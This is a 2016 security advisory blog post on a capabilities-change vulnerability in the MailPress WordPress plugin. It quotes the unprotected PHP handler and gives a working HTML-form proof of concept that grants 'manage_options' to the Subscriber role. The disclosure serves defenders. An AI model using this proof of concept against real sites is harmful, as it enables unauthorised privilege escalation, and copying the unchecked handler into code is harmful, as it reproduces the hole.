14 Jul 2016

Capabilities Change Vulnerability in MailPress

As detailed in other post about a vulnerability in the MailPress plugin, we recently had a request for a file from that plugin on this website, which since we are not using the plugin, is usually an indication that someone is probing for usage of a plugin before exploiting something in it. While we could not find a vulnerability that we think would be the one that a hacker would be trying to exploit, we did find a local file inclusion vulnerability that is serious and exploitable in the plugin’s default state. We also found a capabilities change vulnerability that is exploitable in the plugin when one of the the plugin’s built-in addons, Roles_and_capabilities, is enabled. That vulnerability would be very serious if non trusted users had accounts on the website .

As mentioned in greater detail in the other post, through the file /mp-includes/action.php it is possible for anyone to make requests to functions that have names that start “mp_action_”. One such action is mp_action_r_and_c(), located in the file /mp-content/add-ons/MailPress_roles_and_capabilities.php. The function has no security checks in place as you can see below, so anyone can add or remove capabilities to WordPress roles if the addon is enabled:

88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
public static function mp_action_r_and_c()
{
	$rcs_option = 'MailPress_r&c_' . $_POST['role'];
	$r = get_role($_POST['role']);
 
	$rcs = get_option($rcs_option);
	if (empty($rcs)) $rcs = array();
 
	if ($_POST['add'])
	{
		$rcs[$_POST['capability']] = 'on';
		if ($r) $r->add_cap($_POST['capability']);
	}
	else
	{
		unset ($rcs[$_POST['capability']] );
		if ($r) $r->remove_cap($_POST['capability']);
	}
	if (!add_option ($rcs_option, $rcs )) update_option ($rcs_option, $rcs);
 
	MP_::mp_die(1);
}

Using that someone with an account that has low level role could give that role capabilities that would normally only exist for higher level users. It also could be used to remove capabilities from higher level users, which could cause problems trying to manage a website.

Proof of Concept

The following proof of concept will add the “manage_options” capability to the Subscriber role.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/mailpress/mp-includes/action.php" method="POST" >
<input type="hidden" name="action" value="r-and-c" />
<input type="hidden" name="role" value="subscriber" />
<input type="hidden" name="capability" value="manage_options" />
<input type="hidden" name="add" value="true" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.

Leave a Reply

Your email address will not be published. Required fields are marked *